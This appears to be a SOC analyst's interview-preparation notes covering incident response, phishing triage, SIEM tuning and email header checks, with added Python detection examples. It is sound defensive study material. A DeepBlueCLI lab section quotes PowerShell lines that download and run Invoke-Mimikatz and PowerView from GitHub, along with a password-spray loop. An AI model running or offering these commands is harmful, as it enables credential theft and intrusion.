EY
Arun - Dawn - The first appearance of light in the sky before sunrise
Ernst & Young is a multinational professional services network with headquarters in
London, England.
Its purpose is "Building a better working world".
Very good culture and people
Outstanding company
Work-life balance
EY really provides quality services.
EY is dedicated to helping organizations solve their toughest challenges.
EY PWC P&G Deloitte
Splunk SIEM, Microsoft Azure Sentinel SIEM, Securonix NG SIEM, ArcSight SIEM
Splunk Ticketing, Service Now, BMC ServiceDesk, Remedy Ticketing System
Carbon Black, Falcon Insight, Sophos Intercept
Symantec ESG AM DLP
Interviewer: Paulo Nicolas and our San Diego InfoSec Team - 90k to 100k
Dexcom Taguig 4.8 Overall 4.0
Outstanding Company
Good Culture & People
Work Life Balance
American healthcare company (specializing in medical devices).
Dexcom was founded in 1999.
Dexcom empowers people to take control of diabetes through innovative continuous
glucose monitoring (CGM) systems.
Headquartered in San Diego, California.
Dexcom empowers people to take control of diabetes and has emerged as a leader in
diabetes care technology.
This company really cares about people. They listen to the needs of users,
caregivers, and providers.
Dexcom simplifies and improves diabetes management around the world.
Yes, no problem. First of all, thank you very much for inviting me to be
interviewed for this position.
My name is Christan George; you can call me George for short. I'm 27 years old. I
have 3 siblings and I am the eldest.
I am applying for this job because I think the skills, the qualities, and the
experience that I have are a strong match for the job description.
Over the years, I have built a lot of skills and qualities that I believe will be a
benefit to your organization.
I'm a very strong team worker, I am very focused on achieving difficult tasks, and I
am the type of person that will work hard and will never let you down.
I feel that if I am the successful candidate for this position, you will quickly
see a positive return on your investment.
I have a total of 8 years of experience in the IT industry, in which my first 3
years were focused on the network engineering side of things and the last 5 years
on information security.
I started my career as an OJT at Rivan School of Technology and was absorbed by the
company.
Rivan is a local company here in the Philippines; it's a three-way company: a
testing center, a training center and a consulting company, with branches in Manila
and Makati.
Basically, it's a solutions company for networking, systems and security.
Rivan deployed me to multiple companies as a NOC analyst under non-disclosure
contractual arrangements.
DPM - This sensor has Suricata installed. It runs to capture network traffic and
creates alerts based on 45,000+ rules in the field.
BCM - This sensor takes the packet header information from the network traffic
mirrored from the customer; after collecting for one hour, it processes the data
through several stages to create an alert.
FSM - This sensor is our security event correlation module that ingests, parses,
and generates alerts from common log sources provided by the customer like Sysmon,
Windows System and Security, firewalls, proxy, NetFlow, DNS, PCAP, DHCP, etc.
VSM - This sensor is deployed as an integrated scanner at the client. Previously
we were using Nessus, but because of a pricing or licensing problem we changed to
SAINT Security Suite as the scanning software. It can also perform data and
security scans based on the critical assets provided by the client.
Lastly, the MCU - this is where we set up an encrypted channel to communicate with
our boxes. We access the web-based console remotely; the alert and traffic data
are presented through the front-end GUI that we call the WebApp.
• I'm doing some tuning of false positives and normal alerts so we can provide more
efficient and effective monitoring.
For example, an authorized scan per the customer's feedback, from scanners like
Qualys, Tenable and Rapid7. We need to tune this out for a specific period of time
to reduce the noise.
CVE - Common Vulnerabilities and Exposures - is a list of publicly disclosed
computer security flaws.
Another example is a CVE alert that was sent out to the customer, but they confirmed
the affected software is unused or nonexistent in their environment. It's a FP; we
need to tune this out to stop the noise and check our detection strategies to see
what logic triggers the alert. We can tweak the rules so we don't receive that kind
of FP alert again and can focus on alerts that are more worth it.
• I'm also auditing IR emails to ensure my associates are following the IR SOP based
on our playbook.
One example of that is correct categorization of the ticket. Every incident should
be properly categorized so the customer will not be confused when they start
investigating. This is very critical because we are using auto-generated templates
for prevention and remediation, and they are unique for every category. Imagine if
you receive a phishing alert and send it out with a malware category: automatically,
one of our recommendations there is to block the offending IP and domain, which is
not always the best practice for handling a phishing alert.
What if this is a legitimate hosting IP and the adversary is actually abusing it?
Let's say DigitalOcean. I'm going to create a domain, point it to the legitimate
hosting IP and send a phishing campaign to your company. What will you do?
Remember, if you block the IP, there are legitimate websites using this IP, so what
we suggest is to block the domain for now, and send a follow-up to confirm with the
customer whether they have any business with them.
• Sometimes we are also creating or modifying FSM alerts based on the forwarded
logs using regex. Common log sources provided by the customer are: Sysmon, Windows
System and Security, firewalls, proxy, NetFlow, DNS, PCAP, DHCP, etc. We are using
default parsers and rules that are maintained by Masergy to make these alerts, but
sometimes we also tailor those alerts if the client wants to be alerted, or not
alerted, on specific parameters such as event codes, logon types, account names,
and admin groups or users.
We gather data via pull or push.
Pull - We offer selected integrations that pull information from a REST API, like
Carbon Black.
Push - The customer can always forward data in syslog format to our box.
You can forward us the logs in syslog format over UDP port 514. Log data is stored
on the device for 365 days.
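Added example (not from the original notes and not Masergy's own FSM parser or rules): a regex-based parser over a constructed key=value syslog feed of Windows Security events, with two tailored rules (an admin RDP logon picked out by logon type and account name, and a burst of failed logons) plus a suppression window for an authorized scanner as described in the tuning notes above. Host names, IPs, accounts and the scan window are all constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of Windows Security events as a customer might forward them
# over syslog/UDP 514. The key=value body is a made-up layout, not a vendor format.
SAMPLE_SYSLOG = """\
<13>Jul 05 09:14:02 DC01 Security: EventID=4624 LogonType=10 TargetUserName=svc_backup IpAddress=10.10.5.23
<13>Jul 05 09:14:09 DC01 Security: EventID=4625 LogonType=3 TargetUserName=jdoe IpAddress=10.10.7.14
<13>Jul 05 09:14:10 DC01 Security: EventID=4625 LogonType=3 TargetUserName=jdoe IpAddress=10.10.7.14
<13>Jul 05 09:14:12 DC01 Security: EventID=4625 LogonType=3 TargetUserName=jdoe IpAddress=10.10.7.14
<13>Jul 05 09:20:00 DC01 Security: EventID=4625 LogonType=3 TargetUserName=administrator IpAddress=10.10.9.9
<13>Jul 05 09:20:01 DC01 Security: EventID=4625 LogonType=3 TargetUserName=administrator IpAddress=10.10.9.9
<13>Jul 05 09:20:02 DC01 Security: EventID=4625 LogonType=3 TargetUserName=administrator IpAddress=10.10.9.9
<13>Jul 05 12:05:00 DC01 Security: EventID=4624 LogonType=10 TargetUserName=jdoe IpAddress=10.10.5.23
<13>Jul 05 12:30:00 DC01 Security: EventID=4625 LogonType=3 TargetUserName=administrator IpAddress=10.10.9.9
<13>Jul 05 12:30:01 DC01 Security: EventID=4625 LogonType=3 TargetUserName=administrator IpAddress=10.10.9.9
<13>Jul 05 12:30:02 DC01 Security: EventID=4625 LogonType=3 TargetUserName=administrator IpAddress=10.10.9.9
"""

EVENT_RE = re.compile(
    r"^<\d+>(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) Security: "
    r"EventID=(?P<eid>\d+) LogonType=(?P<ltype>\d+) "
    r"TargetUserName=(?P<user>\S+) IpAddress=(?P<ip>\S+)$"
)

# Tuning knobs a client might ask for (all constructed):
ADMIN_ACCOUNTS = {"svc_backup", "da_admin"}   # accounts whose RDP logons must be alerted
AUTHORIZED_SCANS = [                           # (scanner IP, window start, window end)
    ("10.10.9.9", datetime(2021, 7, 5, 9, 0), datetime(2021, 7, 5, 11, 0)),
]
FAIL_THRESHOLD = 3
FAIL_WINDOW = timedelta(seconds=60)


def parse_event(line, year=2021):
    """Parse one syslog line into a dict, or return None if it does not match."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "host": m["host"], "eid": int(m["eid"]),
            "ltype": int(m["ltype"]), "user": m["user"], "ip": m["ip"]}


def is_authorized_scan(ev):
    """True if the source IP is a known scanner inside its approved window."""
    return any(ev["ip"] == ip and start <= ev["ts"] <= end
               for ip, start, end in AUTHORIZED_SCANS)


def run_rules(text):
    """Apply the two rules to every line; return the alerts as tuples."""
    alerts = []
    failures = defaultdict(deque)   # source IP -> timestamps of recent 4625s
    for line in text.splitlines():
        ev = parse_event(line)
        if ev is None or is_authorized_scan(ev):
            continue                 # unparsable, or tuned out as an authorized scan
        # Rule 1: successful RDP logon (logon type 10) by a watched admin account.
        if ev["eid"] == 4624 and ev["ltype"] == 10 and ev["user"].lower() in ADMIN_ACCOUNTS:
            alerts.append(("ADMIN_RDP_LOGON", ev["user"], ev["ip"]))
        # Rule 2: FAIL_THRESHOLD failed logons from one IP inside FAIL_WINDOW.
        elif ev["eid"] == 4625:
            q = failures[ev["ip"]]
            q.append(ev["ts"])
            while q and ev["ts"] - q[0] > FAIL_WINDOW:
                q.popleft()
            if len(q) == FAIL_THRESHOLD:
                alerts.append(("LOGON_FAILURE_BURST", ev["ip"], len(q)))
    return alerts


if __name__ == "__main__":
    for alert in run_rules(SAMPLE_SYSLOG):
        print(alert)
```

The scanner's failures at 09:20 fall inside its approved window and produce nothing; the same scanner at 12:30 is outside the window and is alerted on, which is what a time-boxed tuning should do.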
• I'm also involved in facilitating training for the new members of the Manila SOC
team.
For example, explaining how they can use some open source tools like URLScan,
VirusTotal, IPVoid, RiskIQ, IPDatabase, Intezer and Whois. If you have IOCs like IP
addresses, hashes and domains, can you check if they are malicious or not? Can you
check if this website is hosting ransomware or malicious JavaScript? Can you give
me some metadata? Can you check if there are different antivirus vendors that would
flag this as malicious?
CyberChef, the cyber Swiss army knife of security professionals. Let's say I have
Base64 strings; at some point in time you will analyze an encoded command that you
need to decode, so this is where you can use CyberChef. You just need to choose the
proper recipe, bake it, and it will automatically give you an output.
What else? CFF Explorer, CAPA, PE Studio and the Sysinternals Suite for static
malware analysis: extract some metadata (like file type, file size, when it was
created and modified, the hashes), the capabilities of the binary (maybe it can
write files, create and terminate processes), important headers, strings, and the
DLLs related to it.
Public malware sandboxes like Hybrid Analysis, Any.Run, Cuckoo and Joe Sandbox: you
can just drop the file or IOCs and they will automatically give you a report.
Let's say I need to know if this is malicious or not and I don't want to run it on
my production laptop, so I will run it in a public malware sandbox. I will drop a
certain file like a PDF and it gives me information like: if a user clicks this
document, what would happen in the background? It would run cmd or PowerShell and
run a couple of commands which are very malicious because they connect to some C2
IP and shortened links; aside from that, we can also see a process graph, or what we
call a process tree, like in Carbon Black or SentinelOne, and some mapping to the
MITRE ATT&CK framework.
Just a caveat here: due to OPSEC (operational security), we don't just upload sample
files coming from our internal network, because they might contain sensitive
information about our organization, like maybe recipes, Project X, or the salary
details of our employees. What we can do is get the hash value of the file and check
it on VT, HA, Intezer and so on.
• We are also assisting with the development of processes and procedures for overall
SOC functions. Since it's the pandemic, the latest is that we did an on-call
procedure and policy, because right now our setup is WFH and sometimes we cannot
ensure that the internet connection is stable or that there will be no power outage
or interruption; lately we have had an earthquake and typhoons here, so we outlined
a document that aims to lessen the risk of our manpower going below the threshold.
Kaseya is a software company that provides services to different MSSPs. They got
breached and they call it a supply chain attack. It's like the same attack last
year, in December, at SolarWinds, which was breached through a supply chain attack
wherein, during updates of the configuration or the platform itself, a backdoor like
a DLL was delivered to all of their clients. But in Kaseya's case it's ransomware;
their platform was infected by ransomware.
A backdoor negates normal authentication procedures to access a system. Remote
access is granted to the adversary, who can remotely issue system commands and
update the malware or the payload itself.
Ransomware is malware that encrypts the victim's files; the adversary demands a
ransom to restore access to the data via a decryption key upon payment.
Terminal Server Aware means that this binary is capable of running under remote
desktop services; even if the interactive logon connection is lost, this binary can
survive using remote desktop services.
The epoch (timestamp) value can be modified by the malware author during the
weaponization phase using low-level languages, and its purpose is to confuse the
forensicators. Let's say: okay, is this a new malware, or no, is this an old
malware? The goal is for the blue teamers to have a hard time distinguishing the
information that they need.
There is some timestomping activity done by APTs: aside from clearing the whole
logs, they can also modify time attributes to hide changes to existing logs. Let's
say I'm going to attack your organization during the weekend, but I don't want you
to see my activities, so I will manipulate the timestamp and blend it in with
weekdays during normal working hours.
IDS (Intrusion Detection System) - It will give you an alert, but it doesn't have
the capability to block.
IPS (Intrusion Prevention System) - If its detection strategy decides that the
traffic is malicious, it can block it.
It monitors network and host traffic, inbound and outbound, for indicators of an
attack.
Cisco, McAfee, Trend Micro, Darktrace, Suricata
Security Onion is a VM with packages wherein it has Bro/Zeek, Suricata and Snort;
all of these open source tools gathered in one VM.
ESG (Email Security Gateway) is a defense against malicious email, spam, spear
phishing, whaling, ransomware and even zero-day attacks.
If you read the reports this 2021 from the Verizon Data Breach Investigations
Report, the Red Canary Threat Detection Report, the Threat Landscape Report and the
Vade Secure report, phishing is still the dominant or most heavily used initial
access in the adversaries' attacks. So if we don't have any security appliance
protecting our email gateway, then we are very vulnerable even to a simple phishing
attack. ESG can do some filtering on common signatures, especially file formats
that were converted from .exe to .pdf; it can block them because of a deep header
analysis feature, I think.
Proofpoint, Mimecast, Forcepoint, Sophos, Microsoft 365 E5
Let's say we have Microsoft 365 E5 and on top of that we are also using Proofpoint
"Advanced Email Security" as an additional layer of security to filter most of the
phishing and spam emails at the perimeter level. For example, we have 1M alerts
related to email; Proofpoint will drill that down to 200K alerts using its deep
header analysis feature, so there is an efficiency. Then the 200K alerts will also
be filtered using the capability of Microsoft 365 E5, by checking if they are
properly aligned to a configuration: if SPF and DKIM pass, allow that email to be
received, but if SPF passes and DKIM fails, I want you to drop or reject it, or put
that email in spam.
Okay, there's a phishing alert on the SIEM. First, I will check the rebuild. It's
the content or log snippet that triggered the alert; maybe there is sensitive
information like username, email and password. I will also check the reputation of
the IP address on VT, IPVoid, Intezer, Talos, X-Force, etc. The domain that was
accessed will be visually inspected in URLScan or CheckPhish. We will also check
all available logs to see if there are other users involved in this alert. Then if
it's a TP based on the analysis, like exposed credentials and the IP and domain
tagged as phishing, we will permanently block it and send an email with a follow-up
call to the client. We will tell them that we detected traffic wherein one of their
users accessed a phishing site and credentials were exposed. It would be advisable
for the user to change credentials to avoid being compromised and to use MFA as
additional security. They also need to delete anything related to the email across
their environment, and the user should take security awareness training.
In some internal cases, the scenario is like HR staff notice that they received an
email with a link and attachment that they were not expecting. What they will do is
create a ticket in JIRA, attach the suspicious email, and forward it to us, and we
will begin the investigation.
1st, as part of Preparation, I will open all the tools that I use when dealing with
this kind of ticket: VT, IPVoid, RiskIQ, Intezer, URLScan, CheckPhish, URLVoid,
MXToolBox, Azure Header Analyzer, PhishTank.
After that I will proceed with Detection and Analysis. I will personally check what
I think about the email: is it spam? Reconnaissance? Impersonation? I can also ask
the user if they clicked the link or downloaded some files. Next is to extract the
full email header information and make sure to check the important fields:
From - does the email address match the display name?
Reply-To - does it match the source or sender? Because if not, there's a very good
chance that it's forged.
Return-Path - does it match where the message originated (the "From")?
Subject - high-level topic of the message.
Source and destination IP.
Received-SPF - whether the mail came from a verified source; you can see the source
IP here.
Authentication-Results - did SPF and DKIM pass?
DKIM-Signature - it contains information about the sender, the message, and the
public key that is required for verification.
Message-ID - it's like a tracking number.
We will also check all the logs for additional information: was the traffic
automatically blocked? How many attempts were triggered in that specific time frame?
Do we have other related users involved in this alert?
Check the reputation of the link: what does it look like? Any hit for phishing?
Put the attachment in a malware sandbox and wait for the report to finish. "You can
DL the binary for future reference."
Upon further investigation I concluded that this is a kind of impersonation because
the sender is [email protected], which is not the naming convention that we
are using in the organization; it should be Wow.PH.com.
Containment phase: we should block the IP address, the domain, and the hashes
related to this ticket. For Eradication, we can request purging of the email because
it has an attachment that we can investigate further, and the deletion of anything
related to this email across our environment.
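Added example (not from the original notes, and not any vendor's code): the header checks listed above (From vs. Reply-To vs. Return-Path, Received-SPF source IP, Authentication-Results, Message-ID) together with the SPF/DKIM gateway policy from the ESG notes earlier, run over a constructed suspicious message and a constructed clean one. The domains, addresses, IPs and the "reject" fallback branch of the policy are all constructed assumptions.

```python
import re
from email import message_from_string
from email.utils import parseaddr

ORG_DOMAIN = "corp.example"   # constructed: the organization's own mail domain

# Constructed suspicious message, headers only (no real sender, IP or organization).
SAMPLE_EMAIL = """\
Return-Path: <bounce@mail-relay.invalid>
Received-SPF: pass (corp.example: domain of bounce@mail-relay.invalid designates 198.51.100.23 as permitted sender) client-ip=198.51.100.23
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=mail-relay.invalid; dkim=fail header.d=corp-example.com
From: "HR Department" <hr@corp-example.com>
Reply-To: recruit.reply@mail-relay.invalid
To: jane.doe@corp.example
Subject: Applicant resume - please review
Message-ID: <20210705091400.1234@mail-relay.invalid>
Date: Mon, 05 Jul 2021 09:14:00 +0800

Please find the attached resume.
"""

# Constructed clean internal message for comparison.
SAMPLE_LEGIT = """\
Return-Path: <it.team@corp.example>
Received-SPF: pass (corp.example: domain of it.team@corp.example designates 203.0.113.5 as permitted sender) client-ip=203.0.113.5
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=corp.example; dkim=pass header.d=corp.example
From: "IT Team" <it.team@corp.example>
To: jane.doe@corp.example
Subject: Patch window tonight
Message-ID: <20210705100000.42@corp.example>

Servers will be patched at 22:00.
"""


def domain_of(header_value):
    """Return the lower-cased domain part of an address header, or '' if absent."""
    _, addr = parseaddr(header_value or "")
    return addr.rpartition("@")[2].lower()


def auth_results(msg):
    """Pull the spf= and dkim= verdicts out of Authentication-Results."""
    ar = msg.get("Authentication-Results", "")
    spf = re.search(r"\bspf=(\w+)", ar)
    dkim = re.search(r"\bdkim=(\w+)", ar)
    return (spf.group(1).lower() if spf else "none",
            dkim.group(1).lower() if dkim else "none")


def gateway_verdict(spf, dkim):
    """Policy from the notes: both pass -> deliver; SPF pass but DKIM fail -> spam.
    The 'reject' branch for anything else is a constructed extension of the notes,
    not a statement of any product's default behaviour."""
    if spf == "pass" and dkim == "pass":
        return "deliver"
    if spf == "pass" and dkim == "fail":
        return "spam"
    return "reject"


def triage(raw_message):
    """Run the header checks from the notes and return findings plus the verdict."""
    msg = message_from_string(raw_message)
    from_domain = domain_of(msg["From"])
    findings = []
    # From: a display name that looks internal but a domain that is not ours.
    if from_domain != ORG_DOMAIN:
        findings.append(f"from_domain_not_org:{from_domain}")
    # Reply-To: a different domain than From is a strong forgery indicator.
    if msg["Reply-To"] and domain_of(msg["Reply-To"]) != from_domain:
        findings.append(f"reply_to_mismatch:{domain_of(msg['Reply-To'])}")
    # Return-Path: should match where the message claims to originate.
    if msg["Return-Path"] and domain_of(msg["Return-Path"]) != from_domain:
        findings.append(f"return_path_mismatch:{domain_of(msg['Return-Path'])}")
    # Received-SPF carries the connecting IP to look up on VT, Talos, X-Force, etc.
    m = re.search(r"client-ip=([\d.]+)", msg.get("Received-SPF", ""))
    source_ip = m.group(1) if m else None
    if not msg["Message-ID"]:
        findings.append("missing_message_id")
    spf, dkim = auth_results(msg)
    return {"from_domain": from_domain, "source_ip": source_ip, "spf": spf,
            "dkim": dkim, "verdict": gateway_verdict(spf, dkim), "findings": findings}


if __name__ == "__main__":
    for raw in (SAMPLE_EMAIL, SAMPLE_LEGIT):
        print(triage(raw))
```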
Let's say that the phishing attempt by the adversary is successful: the HR staff
downloaded the attachment and ran the executable disguised as a PDF file, like a
resume of an applicant.
It was detected by the SIEM. I will click the ticket and be redirected to our EDR,
which will display everything that I need for the investigation.
It will display information like: file name, file type, file path, hashes, IP
addresses, original process and command line arguments; there's a lot.
Since I have this information and my tools are already prepared, I will start with
the analysis phase. I will correlate or fetch the host and network logs, or all the
logs, based on the IP address and hashes; maybe there is some connection going
outside of our network that is happening.
I will also check the reputations on VT, Talos and X-Force, and check the file
path; maybe something was dropped in the %Temp%, %AppData% or %Public% folder. By
doing that I can already tell if this is related to some ransomware campaign.
If this is a TP, we have an incident. I need to act fast, I need to stop the
bleeding, and I will start the containment since I'm the first responder.
I will take actions like: connect to this patient zero, move it to our isolated
platform or another site using the EDR, and disconnect it from the network, the
internet and everything. It's just me and this machine.
After that, permanently block the IP addresses; check the dashboards, maybe there
are Russian, North Korean or Ukrainian IP addresses connecting to our system; block
the domains, the hashes, and those uncommon ports that are present in the logs.
Next is the eradication phase. It's the full removal of the remnants or artifacts of
the attacker in our environment.
Since we saw a binary that was dropped in the %Temp%, %AppData% or %Public% folder,
it's about time to remove it.
We can also check for persistence, like a created scheduled task or a modified
binary in the Run keys and Startup folder.
It's also time to patch the system, since maybe there is a vulnerability, and kill
some processes. We can also initiate an anti-malware and IOC scan on the whole
system for eradication.
For the recovery procedure, it's some sort of making sure that all the applications
on the system are running and updated before putting it back into production, and
making some verified backups as well. For post-incident activity, which is very
important, we can put in the report how it bypassed our security controls at the
perimeter level (maybe a configuration problem with our ESG, something like that),
and how we can detect this kind of initial access where an email has an attachment
that is compressed and password protected. Conduct security awareness training: if
you are not expecting an email and it's not from our organization, you should report
it to the IT team.
We have an alert in our SIEM. We detected a file on this machine that is connecting
to an external IP address. What will you do?
Okay, for this scenario I will assume that the preparation and detection phases are
done already. I will focus on the analysis until the last phase. First, I will check
the rebuild: what is the detection strategy that triggered the alert? Maybe this is
related to some process creation, like notepad.exe spawning cmd or PowerShell and
connecting to some offending IP; I can see there what arguments were used. After
that I will check the IP notes, sensor notes and alert notes; maybe this is normal
behavior in the client's environment, like they are testing something. Aside from
that, I will check the reputation of the IP address involved, the hashes and some
domains, after generating all the available logs to see which internal machine was
involved in that time frame. If there are no related notes and it has a malicious
reputation based on the tools that were used, I will block it as part of the
containment phase: put the hashes in the EDR, and the IP address and domain on the
firewall, and request a permanent block after confirming with the customer side
that they don't have any business with them. For the eradication phase I will
delete the files involved, kill the process, and patch the system. We can also
initiate an anti-malware and IOC scan on the whole system for eradication.
For the recovery procedure, it's some sort of making sure that all the applications
on the system are running and updated, and making some verified backups as well. For
post-incident activity, which is very important, we can put in the report how it
bypassed our security controls at the perimeter level, maybe some configuration
problem, something like that. Conduct security awareness training: if you are not
expecting an email and it's not from our organization, you should report it to the
IT team.
Fileless malware is a type of malicious software that uses legitimate programs like
cmd or PowerShell to blend into normal traffic and be more stealthy. It's a kind of
attack that runs in memory; it's not touching the disk and is more sophisticated, so
anti-malware defenses, even with updated signatures, can't easily detect it. An
example is the adversary tricking the user into clicking a link and downloading a
file; when executed, it will use cmd in the background to launch PowerShell, which
connects to, let's say, some repository on GitHub to get PowerShell Empire and
automatically run its intended actions. Empire is a pure PowerShell
post-exploitation framework. It quickly deploys a lot of post-exploitation modules
ranging from keyloggers to Mimikatz, and adaptable communications to evade network
detection, all wrapped up in one framework. We can use DeepBlueCLI, a PowerShell
module for threat hunting via Windows event logs, and other frameworks to
investigate this.
Incident Response: Detecting Host Fileless Attacks (DeepBlueCLI lab)
PowerShell (Run as Admin)
cd "C:\Users\IEUser\Desktop\CDTH Lab Files\Day2\DeepBlueCLI-master"
.\DeepBlue.ps1 .\evtx\password-spray.evtx
  Detections: 4648 Password Spray Attack; 1102 Audit Log Was Cleared
.\DeepBlue.ps1 .\evtx\metasploit-psexec-native-target-security.evtx
  Detection: 4688 A new process has been created, with command lines such as:
  powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
  powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
.\DeepBlue.ps1 -log PowerShell
.\DeepBlue.ps1 -log PowerShell | Out-GridView
PowerShell (Run as Admin)
Foreach ($num in 1..100){echo bad | runas /user:guidem$num cmd.exe}
  (lab simulation of a password spray, to generate the Security events DeepBlueCLI flags)
.\DeepBlue.ps1 -log Security
.\DeepBlue.ps1 -log Security | Out-GridView
Actually, I read something related to that online: if you are a CISO of an
organization and doing some security awareness, you should be more sensitive as
well, because there's this CISO that ran a security awareness campaign during COVID
time, when people were desperate for money and bonuses.
This CISO created a bogus phishing email for security awareness in that
organization, telling everyone that they had this amount of bonus and it would be
given next month because the company was doing well as a team, we hit our targets,
so please click this link in order to confirm your identity, something like that.
This CISO got roasted on Twitter for being insensitive at a time like this, with a
lot of comments like: this is not how you perform a security awareness program; it's
not the time to trick users in terms of salary bonuses or whatever.
The suggestion here is to be sensitive when creating a security awareness program.
Everyone is having a breakdown right now because of COVID; not everyone has the
capacity or capability to survive the next few weeks or months; people are so
desperate right now, so just be careful with that.
If I remember it clearly, we used DLP logs in an insider threat incident. Our
client suspected that one of their privileged employees, who had rendered a 15-day
notice, was always taking overtime and maybe trying to access or exfiltrate some
data. So what we did there was extract multiple logs, including DLP logs, Windows
logs, USB logs and logon logs, based on the time frame that they gave. After that we
investigated and correlated them, tying them together using the event IDs, and we
found out that this user was logged in at that time, trying to access this folder
and exfiltrate the data using a flash drive. Then they closed the ticket; they would
be the ones to handle the incident from that point. Thank you for the assistance.
5145: A network share object was checked to see whether client can be granted
desired access
4656: A handle to an object was requested
4663: An attempt was made to access an object
4658: The handle to an object was closed
wmic diskdrive get interfacetype,mediatype,model
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB
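Added example (not from the original notes or from any product): correlating the event IDs listed above for the insider-threat case, tying 4656/4663/4658 together by handle ID, checking 5145 against the client's sensitive shares, flagging an after-hours 4624, and parsing the output of the wmic diskdrive command for removable media. Accounts, hosts, share names, timestamps and the wmic output are all constructed.

```python
import re
from datetime import datetime, time

# Constructed inputs for the insider-threat walkthrough above (not real client data).
SENSITIVE_SHARES = (r"\\FS01\HR$",)            # shares the client flagged as sensitive
BUSINESS_HOURS = (time(8, 0), time(18, 0))     # logons outside this window are notable

# Security-log records as they might be exported from the SIEM.
EVENTS = [
    {"ts": "2021-07-03 21:02:11", "id": 4624, "user": "r.cruz", "detail": "LogonType=2 Workstation=WS-HR-07"},
    {"ts": "2021-07-03 21:05:40", "id": 5145, "user": "r.cruz", "detail": r"ShareName=\\FS01\HR$ RelativeTargetName=Payroll\2021_Q2.xlsx"},
    {"ts": "2021-07-03 21:05:41", "id": 4656, "user": "r.cruz", "detail": r"ObjectName=D:\Shares\HR\Payroll\2021_Q2.xlsx HandleId=0x3f4"},
    {"ts": "2021-07-03 21:05:42", "id": 4663, "user": "r.cruz", "detail": r"ObjectName=D:\Shares\HR\Payroll\2021_Q2.xlsx AccessMask=0x1 HandleId=0x3f4"},
    {"ts": "2021-07-03 21:05:43", "id": 4658, "user": "r.cruz", "detail": "HandleId=0x3f4"},
    {"ts": "2021-07-05 10:12:00", "id": 4663, "user": "m.santos", "detail": r"ObjectName=D:\Shares\Public\holiday.txt AccessMask=0x1 HandleId=0x41c"},
]

# Constructed output of "wmic diskdrive get interfacetype,mediatype,model" on WS-HR-07.
WMIC_OUTPUT = """\
InterfaceType  MediaType                Model
SCSI           Fixed hard disk media    VMware Virtual disk SCSI Disk Device
USB            Removable Media          SanDisk Ultra USB Device
"""


def parse_wmic(text):
    """Turn wmic's column-aligned table into dicts; columns are split on 2+ spaces."""
    rows = [re.split(r"\s{2,}", line.strip())
            for line in text.strip().splitlines() if line.strip()]
    if not rows:
        return []
    header, body = rows[0], rows[1:]
    return [dict(zip(header, row)) for row in body]


def build_timeline(events, user, start, end):
    """Events for one account inside the client's time frame ("YYYY-MM-DD HH:MM:SS")."""
    fmt = "%Y-%m-%d %H:%M:%S"
    lo, hi = datetime.strptime(start, fmt), datetime.strptime(end, fmt)
    mine = [{**e, "ts": datetime.strptime(e["ts"], fmt)} for e in events if e["user"] == user]
    return sorted((e for e in mine if lo <= e["ts"] <= hi), key=lambda e: e["ts"])


def handle_id(detail):
    """Extract the HandleId field that links 4656, 4663 and 4658 for one object."""
    m = re.search(r"HandleId=(0x[0-9a-fA-F]+)", detail)
    return m.group(1) if m else None


def assess(timeline, wmic_text=""):
    """Tie the event IDs together and return the set of flags for the report."""
    flags = set()
    open_handles = {}   # HandleId -> object name, from the 4656 until the matching 4658
    for e in timeline:
        if e["id"] == 4624 and not (BUSINESS_HOURS[0] <= e["ts"].time() <= BUSINESS_HOURS[1]):
            flags.add("after_hours_logon")
        elif e["id"] == 5145 and any(s in e["detail"] for s in SENSITIVE_SHARES):
            flags.add("sensitive_share_access")
        elif e["id"] == 4656:
            open_handles[handle_id(e["detail"])] = e["detail"].split(" HandleId=")[0]
        elif e["id"] == 4663 and handle_id(e["detail"]) in open_handles:
            flags.add("object_accessed_via_open_handle")
        elif e["id"] == 4658:
            open_handles.pop(handle_id(e["detail"]), None)
    if any(d.get("InterfaceType") == "USB" and "Removable" in d.get("MediaType", "")
           for d in parse_wmic(wmic_text)):
        flags.add("removable_media_present")
    return flags


if __name__ == "__main__":
    tl = build_timeline(EVENTS, "r.cruz", "2021-07-01 00:00:00", "2021-07-10 00:00:00")
    for e in tl:
        print(e["ts"], e["id"], e["detail"])
    print(sorted(assess(tl, WMIC_OUTPUT)))
```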
Let's say I receive an alert on the event notifier of our SIEM regarding OpenVAS,
SQL injection, password file or Nmap, anything related to an inbound vulnerability
scan. I will click the event and it will auto-redirect me to the monitoring
console. I will do a quick filter on the offending IP to check whether these alerts
also appear on the other sensors; after that I will check the rebuild to see what
detection strategy triggered the alert. I will also generate the logs from this IP
to check if it was blocked by the other security controls deployed in the
environment. I will check if there are any alert notes, sensor notes or IP notes
for this; if there are no notes I will automatically block it because it's an
offending IP that is not confirmed in the environment. I will start to create an IR
email and put in all the analysis that I did, like: based on the logs, the traffic
was not automatically blocked; the IP address involved has a malicious reputation;
it's scanning the network to gain information that could help them compromise your
system. Also, I will tell them that I already permanently blocked the offending IP.
IEC 62443
ICS/SCADA
Industrial control systems (ICS) are often managed via Supervisory Control and Data
Acquisition (SCADA) systems that provide a GUI for operators to easily observe the
status of a system, receive any alarms indicating out-of-band operation, or enter
system adjustments to manage the processes.
The Pyramid of Pain was created by David Bianco, a famous guy and SANS instructor.
This framework was created to highlight the different artifacts and the impact on
the adversaries if we detect them from a defensive approach.
The Pyramid of Pain consists of 6 different levels; from the bottom:
hash values - trivial
IP address - easy
domain names - simple
network/host artifacts - annoying
tools - challenging
TTPs - tough!
Let's say I'm the attacker and the defenders are able to detect the hash value of
the file that I'm using; that's going to be trivial to me. I can easily change a
single character in my code, save it, compile it and then I will have a new hash
value; in just a snap I can easily change its hash value.
And then you find my IP address. As a defender you will block it, and for me that's
easy. I don't care, because I can easily spin up some cloud instance and it will
